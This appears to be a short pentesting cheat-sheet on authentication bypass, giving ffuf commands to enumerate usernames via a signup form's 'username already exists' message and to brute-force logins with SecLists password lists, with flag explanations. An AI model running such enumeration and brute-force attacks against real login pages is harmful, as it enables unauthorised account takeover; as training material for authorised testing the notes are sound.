Authentication Bypass

Username Enumeration with FFUF

ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u -mr "username already exists" >users.txt

-X Request Method

-w Wordlist

-d specifies the data that we are going to send

-H Headers

-mr the text on the page we are looking for to validate we've found a valid username.

Bruteforce with FFUF

ffuf -w users.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u -fc 200

Last updated